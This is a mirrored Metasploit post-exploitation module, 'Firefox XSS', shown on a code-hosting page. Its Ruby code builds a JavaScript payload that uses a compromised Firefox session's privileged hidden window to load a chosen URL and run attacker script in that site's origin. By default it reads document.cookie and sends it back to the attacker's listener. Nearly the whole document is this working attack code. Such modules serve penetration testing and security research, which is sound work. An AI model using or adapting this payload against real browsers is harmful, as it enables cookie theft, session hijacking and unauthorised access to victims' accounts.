Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/firefox/gather/xss.rb
19778 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'json'

7


8
class MetasploitModule < Msf::Post

9
  include Msf::Payload::Firefox

10
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Firefox XSS',

17
        'Description' => %q{

18
          This module runs the provided SCRIPT as javascript in the

19
          origin of the provided URL. It works by navigating to a hidden

20
          ChromeWindow to the URL, then injecting the SCRIPT with Function().

21
          The callback "send(result)" is used to send data back to the listener.

22
        },

23
        'License' => MSF_LICENSE,

24
        'Author' => [ 'joev' ],

25
        'Platform' => [ 'firefox' ],

26
        'Notes' => {

27
          'Stability' => [CRASH_SAFE],

28
          'SideEffects' => [],

29
          'Reliability' => []

30
        }

31
      )

32
    )

33


34
    register_options([

35
      OptString.new('SCRIPT', [true, 'The javascript command to run', 'send(document.cookie)']),

36
      OptPath.new('SCRIPTFILE', [false, 'The javascript file to run']),

37
      OptString.new('URL', [

38
        true, 'URL to inject into', 'https://metasploit.com'

39
      ]),

40
      OptInt.new('TIMEOUT', [true, 'Maximum time (seconds) to wait for a response', 90])

41
    ])

42
  end

43


44
  def run

45
    results = js_exec(js_payload)

46
    if results.present?

47
      print_good results

48
    else

49
      print_error 'No response received'

50
    end

51
  end

52


53
  def js_payload

54
    js = datastore['SCRIPT'].strip

55
    %|

56


57
      (function(send){

58
        #{set_timeout_source}

59


60
        var hiddenWindow = Components.classes["@mozilla.org/appshell/appShellService;1"]

61
                               .getService(Components.interfaces.nsIAppShellService)

62
                               .hiddenDOMWindow;

63


64
        hiddenWindow.location = 'about:blank';

65
        var src = (#{JSON.unparse({ src: js })}).src;

66
        var key = "#{Rex::Text.rand_text_alphanumeric(8..19)}";

67


68
        hiddenWindow[key] = true;

69
        hiddenWindow.location = "#{datastore['URL']}";

70


71
        var evt = function() {

72
          if (hiddenWindow[key]) {

73
            setTimeout(evt, 200);

74
          } else {

75
            setTimeout(function(){

76
              try {

77
                send(hiddenWindow.wrappedJSObject.Function('send', src)(send));

78
              } catch (e) {

79
                send("Error: "+e.message);

80
              }

81
            }, 500);

82
          }

83
        };

84


85
        setTimeout(evt, 200);

86
      })(this.send);

87


88
    |.strip

89
  end

90
end

91


92